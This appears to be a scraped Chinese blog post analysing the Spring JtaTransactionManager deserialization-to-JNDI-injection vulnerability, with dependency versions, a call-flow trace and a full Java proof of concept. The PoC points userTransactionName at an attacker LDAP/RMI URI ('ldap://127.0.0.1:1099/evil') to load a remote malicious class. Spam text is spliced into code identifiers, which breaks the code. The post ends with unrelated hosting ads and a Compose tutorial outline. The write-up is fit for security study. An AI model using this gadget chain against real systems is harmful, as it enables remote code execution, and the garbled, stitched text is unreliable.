漏洞原理
Spring框架的JtaTransactionManager
类中重写了readObject
方法,这个方法最终会调用到JNDI中的lookup()
方法,关键是里面的参数可控,这就导致了攻击者可以利用JNDI注入中的lookup()参数注入,传入恶意URI地址指向攻击者的RMI注册表服务,以使受害者客户端加载绑定在攻击者RMI注册表服务上的恶意类,从而实现远程代码执行。
环境依赖
org.springframework
spring-tx
4.2.4.RELEASE
org.springframework
spring-context
4.2.4.RELEASE
javax.transaction
javax.transaction-api
1.2
流程分析
漏洞入口在org/springframework/transaction/jta/JtaTransactionManager.java
的readObject方法
跟进initUserTransactionAndTransactionManager
跟进lookupUserTransaction
,这里调用了lookup
跟进lookup方法
继续跟进lookup方法,这里调用的是ctx的lookup方法,ctx是一个Context类型,往后追踪ctx,发现ctx其实是InitialContext
类的实例,所以这里我们控制name的值就能直接打JNDI注入了
name就是JtaTransactionManager
的属性userTransactionName
,我们可以反射修改它的值
package org.example;
import org.springframework.transaction.jta.JtaTransactionManager;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
public class Main {
public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();
Field userTransactionName = JtaTransactionManager.c服务器托管lass.getDeclaredField("userTransactionName");
userTransactionName.setAccessible(true);
userTransactionName.set(jtaTransactionManager, "ldap://127.0.0.1:1099/evil");
// 序列化
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("test.bin"));
oos.writeObject(jtaTransactionManager);
// 反序列化
byte[] bytes = Files.readAllBytes(Paths.get("D:Java安全学习SpringJNDItest.bin"));
ByteArrayInputStream bis = new ByteArrayInputStream(bytes);
ObjectInputStream obj = new ObjectInp服务器托管utStream(bis);
obj.readObject();
}
}
成功注入
rmi也是同理,把ldap换成rmi就行了,至于恶意服务端怎么搭建,之前的文章有讲过,这里就不再复述
服务器托管,北京服务器托管,服务器租用 http://www.fwqtg.net
机房租用,北京机房租用,IDC机房托管, http://www.fwqtg.net
目录 好处 入门 Composable 布局 其他组件 列表 verticalScroll 延迟列表 内容内边距 性能 修饰符 偏移量 requiredSize 滚动 添加间距Spacer Button Context 文字图片 TextField 重组 状态…